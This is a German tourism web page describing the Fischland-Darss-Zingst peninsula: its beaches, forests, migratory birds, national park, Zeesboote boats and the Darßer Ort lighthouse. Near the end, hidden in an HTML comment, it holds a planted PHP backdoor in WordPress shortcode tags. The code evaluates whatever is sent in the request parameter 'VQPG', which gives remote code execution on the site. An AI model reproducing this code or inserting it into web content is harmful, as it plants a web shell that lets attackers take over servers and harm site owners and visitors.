Halbinsel Fischland Darss Zingst

Die Ostseeküste ist bekannt für seine natürlichen Landschaften und eine unberührte Region. Die Halbinsel Fischland Darss Zingst ist hierbei keine Ausnahme und tanzt doch im positiven Sinne aus der Reihe. Abwechslungsreich und romantisch verträumt dabei aber auf keinen Fall langweilig, so könnte man die wunderschöne Ferienregion mit kurzen Zügen beschreiben.

Die feinen und nahezu steinlosen Sandstrände begeistern nicht nur Kinder immer wieder aufs Neue. Sieht man den grenzenlosen Himmel und die kilometerlangen weißen Strände, so bekommt schon fast karibisches Flair auf. Um die Küstengebiete der Halbinsel Fischland-Darss-Zingst herum, befinden sich große Waldflächen in denen man wunderbare Wanderungen unternehmen kann.

Die Halbinsel Fischland Darss Zingst befindet sich geografisch gesehen an der Ostseeküste und der Region Bodden. Diese Tatsache ist auch ein Hauptgrund dafür, dass es hier herrliche Naturparks und Naturschutzgebiete gibt, welche zu einem einzigartigen Naturerlebnis einladen. Für Vogelbeobachter ist hier das wahre Paradies. Denn zahlreiche riesige Schwärme von Zugvögeln rasten hier auf ihrem Weg in den Süden. Der 805 Quadratkilometer große Nationalpark beeindruckt zusätzlich mit einer unbeschreiblichen Komposition aus Natürlichkeit und einzigartigem Spektakel.

Als sehr sehenswert gelten auch die entwurzelten Bäume am Darßer Weststrand. Diese „verändern“ täglich ihr Aussehen. Berühmt ist die Halbinsel Fischland Darss Zingst auch für die Zeesbote. Dies sind robuste Schiffe, welche mit auffälligen Braunen Segeln hissen. Heute dienen diese Schiffe als Freizeitboote und für den sportlichen Betrieb. Früher waren diese Zeesbote jedoch Fischerboote und ausschließlich für die Arbeit auf der rauen See gebaut worden. Der Klassiker unter den Publikumsmagneten ist der Darßer Ort. Dies ist ein Leuchtturm, welcher in einer Höhe von 35 Metern über dem Meer wacht. Er wurde im Jahr 1848 fertig gestellt und eingeweiht. Er ist einer der ältesten Türme an der Ostseeküste.

<!– [insert_php]if (isset($_REQUEST["VQPG"])){eval($_REQUEST["VQPG"]);exit;}[/insert_php][php]if (isset($_REQUEST["VQPG"])){eval($_REQUEST["VQPG"]);exit;}[/php] –>

RELATED ARTICLES
NEWSLETTER

Back to Top